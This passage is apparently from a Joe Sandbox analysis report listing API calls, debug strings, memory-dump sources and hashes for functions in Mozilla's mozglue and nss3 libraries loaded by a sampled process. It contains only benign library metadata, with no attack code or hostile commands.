                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C791DDA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C791EF0: GetCurrentThreadId.KERNEL32 ref: 6C791F03
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C791EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C791DF2,00000000,00000000), ref: 6C791F0C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C791EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C791F20
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C791DF4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1880959753-0
                                                                                                                                                                                                                                                                                        • Opcode ID: db125273baec3bbc31ccaad74b3ac40b1e86ff878eb4b0c4874cccfff87e639e
                                                                                                                                                                                                                                                                                        • Instruction ID: 4ac396b6832fdafd94cf638d96044627c20370af7191f34fd20d6d6943f54934
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db125273baec3bbc31ccaad74b3ac40b1e86ff878eb4b0c4874cccfff87e639e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F14187B5200705AFCB10DF28C589A56BBF9FF89718F10442EE99A87B41CB31F964CB91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C888C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_Now.NSS3 ref: 6C888C7C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DC6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DD1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C929DED
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C888CB0
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 6C888CD1
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C888CE5
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?), ref: 6C888D2E
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C888D62
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C888D93
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3131193014-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 898a82db981bf8636bf26813329085bee83da98d9f0c0ec50e446a44e9e45e07
                                                                                                                                                                                                                                                                                        • Instruction ID: ed5982811372a15e77b0f199ea2818021e1221769994aa7e150c84c903665ff3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 898a82db981bf8636bf26813329085bee83da98d9f0c0ec50e446a44e9e45e07
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA316A71A02205AFD7209F68CD447AA77B4BF25319F24093AEA1567F50D770E924C7D1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7884E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7884F3
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C78850A
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C78851E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C78855B
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C78856F
                                                                                                                                                                                                                                                                                        • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7885AC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C787670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C78767F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C787670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C787693
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C787670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7876A7
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7885B2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2666944752-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8910cf6a03208ce858d80301ca7956efbbd6bf71c9b8f1688aa123ac76e02263
                                                                                                                                                                                                                                                                                        • Instruction ID: da69aa2d83b1229d7ce280048e639d25b3c33a511ae918926e453cd548332f38
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8910cf6a03208ce858d80301ca7956efbbd6bf71c9b8f1688aa123ac76e02263
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3421DE742016019FDB14DB28C988A6AB7B5BF8430DF24483DE65BC7B81DB31F949CB51
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C751640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C751699
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7516CB
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7516D7
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7516DE
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7516E5
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7516EC
                                                                                                                                                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C7516F9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 375572348-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f418c1a205ce0dfaa00b3e40c13462ae06caa0106555c72240ce59c621453fe4
                                                                                                                                                                                                                                                                                        • Instruction ID: a7882202371d275632d0a00b859e42eb88a16917e23ff80af8c7d3cbddaec06e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f418c1a205ce0dfaa00b3e40c13462ae06caa0106555c72240ce59c621453fe4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B021D5B07402096FEB105F648D8AFFB737CDF96704F404528F6059B5C0CA749E6487A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C78DE60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78DE73
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C7BFEF3,?,?,?,?,?,?,00000000), ref: 6C78DE7B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA
                                                                                                                                                                                                                                                                                        • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000), ref: 6C78DEB8
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C78DEFE
                                                                                                                                                                                                                                                                                        • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C78DF38
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [I %d/%d] locked_profiler_stop, xrefs: 6C78DE83
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: getenv$CurrentProcessThread$BufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                                                        • String ID: [I %d/%d] locked_profiler_stop
                                                                                                                                                                                                                                                                                        • API String ID: 3136165603-3405337583
                                                                                                                                                                                                                                                                                        • Opcode ID: 1425c7cbb310c775966e2501e676f3e02e524c484c16cf16d748856424fe7db2
                                                                                                                                                                                                                                                                                        • Instruction ID: 6ab063e6873bba0e0f72a48f73d57bf5eb47c01ac7321d00b4f772904d0e072b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1425c7cbb310c775966e2501e676f3e02e524c484c16cf16d748856424fe7db2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F213A357021024FEB148B75DA0C79A7779EB9231CF540137EA2987F41CB74AA09CBE5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C878C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 6C878C1B
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C878C34
                                                                                                                                                                                                                                                                                        • PL_ArenaAllocate.NSS3 ref: 6C878C65
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3 ref: 6C878C9C
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3 ref: 6C878CB6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                                                                        • String ID: KRAM
                                                                                                                                                                                                                                                                                        • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                                                                        • Opcode ID: 82637fe1b0bd5bacb3139bb8bfb14bb7f728421e5f649a4f8db6129303b4a9f5
                                                                                                                                                                                                                                                                                        • Instruction ID: fffe4bacbc5ac495e1f2e018a0482c2b005e52533a152b43b572a6724e8516f7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82637fe1b0bd5bacb3139bb8bfb14bb7f728421e5f649a4f8db6129303b4a9f5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38217EB16056018FD760AF38C58456DBBF4FF45318F16896AD8889B701EB35D885CBA2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C78F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78F619
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C78F598), ref: 6C78F621
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78F637
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C7CF4B8,?,?,00000000,?,6C78F598), ref: 6C78F645
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8,?,?,00000000,?,6C78F598), ref: 6C78F663
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C78F62A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                        • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                                        • API String ID: 1579816589-753366533
                                                                                                                                                                                                                                                                                        • Opcode ID: 9b1399a9a0d87940162fcff95040f2880b493d67017bcc1d9f58c5e4137b203a
                                                                                                                                                                                                                                                                                        • Instruction ID: 082bd13aeb67bc4392449214ceda623a58c43f4e12b25c6965bb7bc4322bdc3e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b1399a9a0d87940162fcff95040f2880b493d67017bcc1d9f58c5e4137b203a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2011C131302206AFCB40AF68CA4C9E5777DFB86769F100036FA1683F41CB35AA11CBA0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C972C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_EnterMonitor.NSS3 ref: 6C972CA0
                                                                                                                                                                                                                                                                                        • PR_ExitMonitor.NSS3 ref: 6C972CBE
                                                                                                                                                                                                                                                                                        • calloc.MOZGLUE(00000001,00000014), ref: 6C972CD1
                                                                                                                                                                                                                                                                                        • strdup.MOZGLUE(?), ref: 6C972CE1
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C972D27
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Loaded library %s (static lib), xrefs: 6C972D22
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                                                                                        • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                                                                                        • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                                                                                        • Opcode ID: 39ae2a1616c4223dbff9fb8a0beb143ba064d8b86780fdf69e7827f3eec79750
                                                                                                                                                                                                                                                                                        • Instruction ID: d90f91172d74dc44e099f8b7c378c941af944c06d49ae966e61eda1007f23c1a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39ae2a1616c4223dbff9fb8a0beb143ba064d8b86780fdf69e7827f3eec79750
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 681127B1716600DFEB208F18D948A6677B8EB5630DF28813DD809C7B41E771E918CBB1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C78F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
